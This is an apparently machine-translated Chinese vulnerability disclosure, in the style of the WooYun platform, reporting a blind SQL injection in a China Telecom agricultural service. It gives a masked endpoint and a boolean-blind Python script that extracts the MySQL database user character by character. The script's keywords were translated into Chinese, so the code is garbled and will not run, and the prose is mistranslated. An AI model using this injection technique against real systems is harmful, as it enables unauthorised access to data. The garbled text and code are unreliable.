中国电信农技宝某处SQL注入一枚

漏洞标题 中国电信农技宝某处SQL注入一枚 相关厂商 中国电信 漏洞作者 darkyantou 提交时间 2016-04-23 12:50 公开时间 2016-06-11 10:20 漏洞类型 SQL…

漏洞标题 中国电信农业科技宝藏SQL注入之一 相关制造商 中国电信 漏洞作者 Darkyantou 提交时间 2016-04-23 12: 50 公共时间 2016-06-11 10: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 10 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 Sql注入 漏洞详细信息 中国电信农业科技宝盲人之一 http://**。**。**。**/uploadFile/loadFeatureImgDataByFileName.do?fileName=d12da195-4e90-486d-ba9e-be00e7383263_20160325022009209.jpg 漏洞证明: 中国电信农业科技宝盲人之一

附在脚本上: #编码=UTF-8 导入请求 进口时间 导入字符串 导入系统 随机导入 标题={'内容类型':'应用程序/x-www-form-urlencoded'} Payloads='abcdefghijklmnopqrstuvwxyz0123456789 @ _。' 打印'开始重新启动MySQL用户:' 用户='' 对于范围(1,28):中的i 对于有效负载:中的有效负载 试试: s='和mid(user(),%s,1)='%s'%(i,有效负载) Url='http://**。**。**。**/uploadFile/loadFeatureImgDataByFileName.do?fileName=d12da195-4e90-486d-ba9e-be00e7383263_20160325022009209.jpg''+ s r=requests.get(url,timeout=5) 如果'Photoshop'在r.content:中 打印有效负载 用户=用户+有效负载 除了: 通过 打印'[完成] MySQL用户是%s'%用户 修理计划: 过滤你知道 版权声明:请注明来源darkyantou @乌云